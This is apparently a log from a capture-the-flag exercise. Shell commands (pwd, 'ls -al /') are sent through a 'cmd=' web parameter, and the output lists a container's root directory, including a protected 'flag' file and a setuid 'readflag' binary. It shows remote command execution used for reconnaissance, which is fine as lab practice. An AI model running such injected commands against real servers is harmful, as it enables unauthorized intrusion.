cmd=pwd
/home/app

cmd=ls%20-al%20/
total 28
drwxr-xr-x    1 root root   114 Jun 26 05:42 .
drwxr-xr-x    1 root root   114 Jun 26 05:42 ..
-rwxr-xr-x    1 root root     0 Jun 26 05:42 .dockerenv
drwxr-xr-x    2 root root     6 Nov  6  2020 app
drwxr-xr-x    1 root root    19 Nov  6  2020 bin
drwxr-xr-x    2 root root     6 Sep 19  2020 boot
drwxr-xr-x    5 root root   340 Jun 26 05:42 dev
drwxr-xr-x    1 root root    66 Jun 26 05:42 etc
-rwx------    1 root root    43 Jun 26 05:42 flag
drwxr-xr-x    1 root root    17 Nov  6  2020 home
drwxr-xr-x    1 root root    21 Nov  3  2020 lib
drwxr-xr-x    2 root root    34 Oct 12  2020 lib64
drwxr-xr-x    2 root root     6 Oct 12  2020 media
drwxr-xr-x    2 root root     6 Oct 12  2020 mnt
drwxr-xr-x    2 root root     6 Oct 12  2020 opt
dr-xr-xr-x 4130 root root     0 Jun 26 05:42 proc
-rwsr-sr-x    1 root root 16712 Jun 25 13:16 readflag
drwx------    1 root root    24 Oct 26  2020 root
drwxr-xr-x    1 root root    20 Nov  6  2020 run
drwxr-xr-x    1 root root    20 Oct 13  2020 sbin
drwxr-xr-x    2 root root     6 Oct 12  2020 srv
-rwxr-xr-x    1 root root   750 Nov  6  2020 start.sh
dr-xr-xr-x   13 root root     0 Jun 14 01:12 sys
drwxrwxrwt    1 root root    46 Jun 26 05:42 tmp
drwxr-xr-x    1 root root    19 Oct 12  2020 usr
drwxr-xr-x    1 root root    28 Oct 12  2020 var
